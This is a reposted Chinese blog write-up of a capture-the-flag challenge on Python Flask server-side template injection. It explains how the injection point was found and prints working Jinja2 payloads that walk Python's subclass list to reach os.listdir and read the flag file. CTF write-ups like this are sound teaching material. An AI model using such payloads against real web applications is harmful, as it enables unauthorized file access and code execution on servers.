热门标签
热门文章
- 1Nginx(engine x)简介(作为Web服务器、正向代理、反向代理、负载均衡、动静分离)
- 2Spark大型项目实战:电商用户行为分析大数据平台
- 3容器网络之Kubernetes CNI_nothing provides kubernetes-cni
- 4Segment Anything Model (SAM)——分割一切,具有预测提示输入的图像分割实践
- 5基于注意力机制GRU网络的机器翻译_gru神经网络内部注意力机制
- 6简洁高效的 NLP 入门指南: 200 行实现 Bert 文本分类 (Pytorch 代码纯享版)_deberta 文本分类
- 7Paper reading: Joint Representation Learning for Text and 3D Point Cloud_jointgt: graph-text joint representation learning
- 82024年Java最新2024最新微信小程序商城搭建教程(附源码),刷java面试题网站_微信商城小程序java
- 9前端框架——React 学习总结,这篇7000字全解决
- 10frp内网穿透远程访问、运维技术_frp p2p
当前位置: article > 正文
攻防世界-Web_python_template_injection_攻防世界python tamp
作者:寸_铁 | 2024-07-11 10:25:17
赞
踩
攻防世界python tamp
原题
解题思路
一说到python的web我就想到flask框架,但从没用过flask注入。
从零学习flask模板注入,这篇文章有详细的介绍。
经过尝试很快就能发现使用{{}}就能注入,并且会回显报错信息,3的位置是{{}}中语句的执行结果。
找可用的引用,有一个file的类型(真不好找啊,又多字长得又像),flag应该会保存至文件中。
{{''.__class__.__mro__[2].__subclasses__()}}
file出现在第41个type中,在72个type有print。
先打印后端的一些文件
- {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
再打印flag
- {{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/寸_铁/article/detail/809705
推荐阅读
相关标签
